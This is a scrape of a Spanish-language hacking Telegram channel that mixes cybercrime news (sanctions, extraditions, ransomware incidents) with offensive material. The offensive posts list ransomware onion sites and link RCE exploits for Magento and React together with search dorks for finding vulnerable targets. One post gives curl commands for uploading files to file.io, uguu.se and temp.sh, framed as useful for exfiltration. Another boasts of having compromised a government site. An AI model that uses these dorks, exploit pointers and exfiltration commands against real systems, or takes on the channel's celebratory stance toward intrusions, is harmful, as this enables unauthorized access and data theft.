🎅FSEC INTEL ES 2.0 📡 🏴☠️🎄
Se revela la identidad de "Rey" administrador de Scattered LAPSUS$ Hunters y Hackers miembro de la pandilla de Ransomware Hellcat 🚨 • La identidad real de Rey es Saif Al-Din Khader, quien se cree que vive en Amán, Jordania. • Antes de liderar SLSH,…
Krebs on Security
Meet Rey, the Admin of ‘Scattered Lapsus$ Hunters’
A prolific cybercriminal group that calls itself "Scattered LAPSUS$ Hunters" made headlines regularly this year by stealing data from and publicly mass extorting dozens of major corporations. But the tables seem to have turned somewhat for "Rey," the moniker…
Media Land LLC un Hosting a prueba de bala ruso fue sancionado por presuntamente apoyar operaciones de Ransomware y redes de Botnets. 🚨🇷🇺
Las autoridades lograron identificar a 3 personas claves dentro de la empresa rusa, Aleksandr Volosovik director general de Media Land, Kirill Zatolokin (Zatolokin) encargado de recibir los pagos y coordinar con actores de amenaza, Yulia Pankova (Pankova) está al tanto de la actividad ilícita de Volosovik, ha ayudado a Volosovik con cuestiones legales y ha manejado sus finanzas.
Como resultado de las sanciones los bienes dentro de los EEUU de Media Land serán confiscados.
https://home.treasury.gov/news/press-releases/sb0319
#rusia #busted
Las autoridades lograron identificar a 3 personas claves dentro de la empresa rusa, Aleksandr Volosovik director general de Media Land, Kirill Zatolokin (Zatolokin) encargado de recibir los pagos y coordinar con actores de amenaza, Yulia Pankova (Pankova) está al tanto de la actividad ilícita de Volosovik, ha ayudado a Volosovik con cuestiones legales y ha manejado sus finanzas.
Como resultado de las sanciones los bienes dentro de los EEUU de Media Land serán confiscados.
https://home.treasury.gov/news/press-releases/sb0319
#rusia #busted
👍5🔥2❤1
DIREWOLF Ransomware 🔐
http://direwolfcdkv5whaz2spehizdg22jsuf5aeje4asmetpbt6ri4jnd4qd.onion/
#onion #ransomware
http://direwolfcdkv5whaz2spehizdg22jsuf5aeje4asmetpbt6ri4jnd4qd.onion/
#onion #ransomware
🔥10
Forwarded from Freedom Fox 🏴☠
#Exploit для CVE-2025-54236 (SessionReaper) - Unauthenticated #RCE в Magento
https://github.com/rapid7/metasploit-framework/pull/20725
Netlas.io: tag.name:"magento" AND http.headers.server:"Apache"
FOFA: app="Magento"
HUNTER : product.name="Adobe Magento"
ZoomEye Dork: app="Magento"
Telegram✉️ @freedomfox
https://github.com/rapid7/metasploit-framework/pull/20725
Netlas.io: tag.name:"magento" AND http.headers.server:"Apache"
FOFA: app="Magento"
HUNTER : product.name="Adobe Magento"
ZoomEye Dork: app="Magento"
Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7
Benzona Ransomware 🔐
http://benzona6x5ggng3hx52h4mak5sgx5vukrdlrrd3of54g2uppqog2joyd.onion/
#ransomware #onion
http://benzona6x5ggng3hx52h4mak5sgx5vukrdlrrd3of54g2uppqog2joyd.onion/
#ransomware #onion
🔥6
Servicio de Hosting File para subir ficheros desde la terminal util para exfiltracion ;) ⬆️🏴☠️
File.io
Limite de subida: 2GB
Tiempo de expiracion de fichero: 14 dias
https://file.io
Comando:
uguu.se
Limite de subida: 64MB
Tiempo de expiracion de fichero: 3 horas
https://uguu.se/
Comando:
temp.sh
Limite de subida: 4GB
Tiempo de expiracion de fichero: 3 dias
https://temp.sh/
Comando:
#tools #resources #terminal #exfiltracion
File.io
Limite de subida: 2GB
Tiempo de expiracion de fichero: 14 dias
https://file.io
Comando:
curl -F "file=@malware.bat" https://file.io
uguu.se
Limite de subida: 64MB
Tiempo de expiracion de fichero: 3 horas
https://uguu.se/
Comando:
curl -i -F files[]=@yourfile.jpeg https://uguu.se/upload
temp.sh
Limite de subida: 4GB
Tiempo de expiracion de fichero: 3 dias
https://temp.sh/
Comando:
curl -F "file=@test.txt" https://temp.sh/upload
#tools #resources #terminal #exfiltracion
www.file.io
file.io - Super simple file sharing
Sharing files with file.io is convenient, anonymous and secure. Just upload files and share the links via email, SMS, Slack, Discord, etc. Easy-to-use REST API.
❤9
🚨Exploit RCE en React (CVE-2025-55182)🏴☠️
Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota de código no autenticado a través de una única consulta HTTP.
🔍 DORKS
FOFA
ZOOMEYE
💣 EXPLOIT/Scanner
https://github.com/sumanrox/rschunter
#dorks #exploit #rce #github
Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota de código no autenticado a través de una única consulta HTTP.
🔍 DORKS
FOFA
app="NEXT.JS" || app="React.js"
ZOOMEYE
http.body="react.production.min.js" http.body="React.createElement(" app="React Router" app="React.js" app="next.js"💣 EXPLOIT/Scanner
https://github.com/sumanrox/rschunter
#dorks #exploit #rce #github
GitHub
GitHub - sumanrox/rschunter: Mass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478
Mass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478 - sumanrox/rschunter
❤5
🎅FSEC INTEL ES 2.0 📡 🏴☠️🎄
🚨Exploit RCE en React (CVE-2025-55182)🏴☠️ Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota…
Y ya tenemos nuestro primer .gob pwneado, como amo los RCE 😁❤️🏴☠️
🔥12❤3
https://www.acronis.com/es/tru/posts/makop-ransomware-guloader-and-privilege-escalation-in-attacks-against-indian-businesses/
#reporte #ransomware
#reporte #ransomware
Acronis
Ransomware Makop: GuLoader y elevación de privilegios en ataques contra empresas indias
Al igual que el ransomware Phobos, su variante Makop sigue aprovechando sistemas expuestos de Protocolo de escritorio remoto (RDP) mientras añade nuevos componentes como exploits de elevación local de privilegios y malware de tipo "loader" (cargador) a su…
Autoridades americanas extraditan a "Hacker" Ucraniana 🇺🇦🇷🇺
Segun el departamento de justicia de EEUU la ciudadana ucraniana Victoria Eduardovna Dubranova, de 33 años es acusada de coordianar y realizar ataques informaticos hacia infraestructura critica dentro de los EEUU y a paises de la OTAN.
Segun documentos de acusacion Dubranova formaba parte de grupos Hacktivista Pro-Rusos como CyberArmyofRussia_Reborn, Z-Pentest y Noname bajo el alias de "Vika" segun ayudo a realizar ataques a sistemas SCADA y realizar ataques de DDOS a varios servidores considerados enemigos de Rusia.
Dubranova fue extraditada a Estados Unidos a principios de este año acusada de apoyar a CyberArmyofRussia_Reborn y se espera que responda por multiples ataques informaticos.
https://www.courthousenews.com/wp-content/uploads/2025/12/united-states-vs-dubranova-indictment-one.pdf
https://www.justice.gov/opa/pr/justice-department-announces-actions-combat-two-russian-state-sponsored-cyber-criminal
#rusia #ucrania #busted #hackers
Segun el departamento de justicia de EEUU la ciudadana ucraniana Victoria Eduardovna Dubranova, de 33 años es acusada de coordianar y realizar ataques informaticos hacia infraestructura critica dentro de los EEUU y a paises de la OTAN.
Segun documentos de acusacion Dubranova formaba parte de grupos Hacktivista Pro-Rusos como CyberArmyofRussia_Reborn, Z-Pentest y Noname bajo el alias de "Vika" segun ayudo a realizar ataques a sistemas SCADA y realizar ataques de DDOS a varios servidores considerados enemigos de Rusia.
Dubranova fue extraditada a Estados Unidos a principios de este año acusada de apoyar a CyberArmyofRussia_Reborn y se espera que responda por multiples ataques informaticos.
https://www.courthousenews.com/wp-content/uploads/2025/12/united-states-vs-dubranova-indictment-one.pdf
https://www.justice.gov/opa/pr/justice-department-announces-actions-combat-two-russian-state-sponsored-cyber-criminal
#rusia #ucrania #busted #hackers
💅12🤔3❤2
Post-Explotacion en Windows sin herramientas (LOLBINS) 🛠🏴☠️
https://xbz0n.sh/blog/living-off-the-land-windows
#recursos #hacking #tools #windows
https://xbz0n.sh/blog/living-off-the-land-windows
#recursos #hacking #tools #windows
xbz0n.sh
Living Off the Land: Windows Post-Exploitation Without Tools
I'll never forget one of my first red team engagements where I learned this lesson the hard way. I'd spent two days carefully phishing my way into a financia...
❤10
Empresa estatal petrolera venezolana golpeada por ciberataque 🇻🇪
Petróleos de Venezuela, SA (siglas PDVSA) victima de un ciberataque la cual dejo notablemente afectado el funcionamiento de sus sistemas informáticos, según fuentes cercanas a PDVSA la empresa fue victima de un Ransomware.
La empresa lanzo un comunicado en su cuenta de Facebook dando la noticia, en la cual acusa a los EEUU de orquestar el ataque como parte de una campaña para apoderarse del petróleo del pais.
Actualmente el sitio web de la empresa se encuentra inactiva y a pesar de que la empresa trato de minimizar los daños se sabe que los daños fueron bien significativos.
FUENTES:
https://www.reuters.com/world/americas/venezuelas-pdvsa-says-operations-unaffected-by-cyber-attack-blames-us-2025-12-15/
https://therecord.media/venezuela-state-oil-company-blames-cyberattack-on-us
https://www.facebook.com/photo/?fbid=1330901405745848&set=a.463991999103464
#venezuela #ciberataque #ransomware
Petróleos de Venezuela, SA (siglas PDVSA) victima de un ciberataque la cual dejo notablemente afectado el funcionamiento de sus sistemas informáticos, según fuentes cercanas a PDVSA la empresa fue victima de un Ransomware.
La empresa lanzo un comunicado en su cuenta de Facebook dando la noticia, en la cual acusa a los EEUU de orquestar el ataque como parte de una campaña para apoderarse del petróleo del pais.
Actualmente el sitio web de la empresa se encuentra inactiva y a pesar de que la empresa trato de minimizar los daños se sabe que los daños fueron bien significativos.
FUENTES:
https://www.reuters.com/world/americas/venezuelas-pdvsa-says-operations-unaffected-by-cyber-attack-blames-us-2025-12-15/
https://therecord.media/venezuela-state-oil-company-blames-cyberattack-on-us
https://www.facebook.com/photo/?fbid=1330901405745848&set=a.463991999103464
#venezuela #ciberataque #ransomware
🔥8🤣3⚡1
Banda criminal venezolana "Tren de Aragua" ataca cajeros automáticos usando Malware 🇺🇸🇻🇪
Según un informe del Departamento de Justicia de EEUU la banda criminal transnacional venezolana se encuentra pirateando cajeros automaticos dentro de los EEUU.
El Departamento de Justicia anunció el jueves dos acusaciones del gran jurado federal que acusan a 54 personas por su presunto papel en una campaña para desarrollar e implementar una variante del malware Ploutus, lo que les permite robar cientos de miles de dólares de cajeros automáticos en todo Estados Unidos.
Ploutus es un Malware desarrollado en C# y altamente obfuscado que apareció por primera vez en el año 2013 en México y desde entonces se fueron encontrando varias variantes, su ultima actividad se registro en el estado de Nebraska, EEUU en donde los miembros de la banda sustrajeron $79,200 de un cajero automático.
FUENTE:
https://therecord.media/doj-charges-gang-malware-ploutus
#mexico #eeuu #malware
Según un informe del Departamento de Justicia de EEUU la banda criminal transnacional venezolana se encuentra pirateando cajeros automaticos dentro de los EEUU.
El Departamento de Justicia anunció el jueves dos acusaciones del gran jurado federal que acusan a 54 personas por su presunto papel en una campaña para desarrollar e implementar una variante del malware Ploutus, lo que les permite robar cientos de miles de dólares de cajeros automáticos en todo Estados Unidos.
Ploutus es un Malware desarrollado en C# y altamente obfuscado que apareció por primera vez en el año 2013 en México y desde entonces se fueron encontrando varias variantes, su ultima actividad se registro en el estado de Nebraska, EEUU en donde los miembros de la banda sustrajeron $79,200 de un cajero automático.
FUENTE:
https://therecord.media/doj-charges-gang-malware-ploutus
#mexico #eeuu #malware
❤16🤨4🌚1